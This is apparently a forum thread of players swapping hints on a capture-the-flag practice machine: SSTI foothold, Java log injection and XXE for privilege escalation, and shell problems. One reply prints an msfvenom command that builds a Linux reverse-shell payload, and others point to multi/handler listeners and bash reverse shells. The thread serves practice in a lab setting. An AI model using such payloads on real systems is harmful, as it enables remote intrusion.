Wow. I finally got it. The method to get privesc was there the whole time… apparently it was already made by the “injector hacker” panda… lol. I feel like a bozo now.
What I could suggest is to patiently read through the java source code to understand the program logic. I think the root flag is at medium level, so be patient and good luck!
Thanks for this. I looked through exif data on one of the images, but that panda always stood out to me as a red flag. At least now I know what angle I should be taking. Also explains why Chronjob is periodically deleting jpegs from the permissible folders.
I’m still not sure how these machines get rated ‘easy.’ Even the foothold was difficult IMO.
Strange. I swear I had permissions, but then again maybe I was reading the permissions wrong.
Anyone willing to PM me about privesc? I think I understand where I need to inject the code, but I don’t know java that well. Also I’m unable to access the file despite having group permissions.
help with this
Load key “ssh_key.txt”: error in libcrypto
Hello everyone, I’m new to this, got access to the shell but if I use any command it keeps knocking me out
hmm. not sure what’s going on here. been a while since i finished this. however i’ll say that i always use msfconsole and spin up a multi/handler listener for reverse shells. hopefully that helps
I had same problem try this msfvenom -p linux/x64/shell_reverse_tcp LHOST= your IP LPORT=4444 -f elf > ~/Desktop/shelf.elf
@antarctica17 Which reverse shell are you using? Could be the shell that does something funky like a meterpreter wrapper. It could also be the way you’re spawning the shell. Maybe your calling gadget quits after reading any data from your shell’s stdout, or it crashes on input/output…
Anyway, great machine to hit the ground running again.
Foothold: Enum and fuzzing, I certainly didn’t ever see these magic chars used before
User: Google FTW, or DuckDuckGo if you care about privacy
Root: Path is expected from an easy machine, nothing obscure. Don’t be discouraged by fixed CVEs, due dilligence reveals they just fixed a setting, but it’s still enabled by default.
Is there a way to obtain root shell? Only could get root flag(
If you can read the flag, then maybe you can read something else that could give you access to the root user.
Try writing a reverse shell in bash and use $ bash -x shell.sh
I was a java developper in my youth (lol) and for sure it helps, but never have to manipulate xml file that way for root, so it was very funny.
Don’t hesitate to dm for hint
I find it weird when cating redpanda.log and nothing seems to be displayed, is it empty? but the java code say otherwise, the App.java is reading lines from this log and is doing smth with it.
First Box Finished! far more in-depth than I imagined but extremely fun nonetheless
Hi! Talking about PrivEsc, I guess you are suggesting a different way from the one that most people are doing. I tried to found it but I am a bit lost, some people said you can go trough SSH ¿credentials?, read Java code and abuse of .log file and XXE and now you say there is a fixed CVE.
I don’t find the first one, I don’t understand well what the coffee code is doing and I am having troubles to see what CVE could be.
Could you give me a little hint?
can someone help me with ssti…
stuck there for very long time…
the web application is not loading up, i didnt even start and i already am running through problems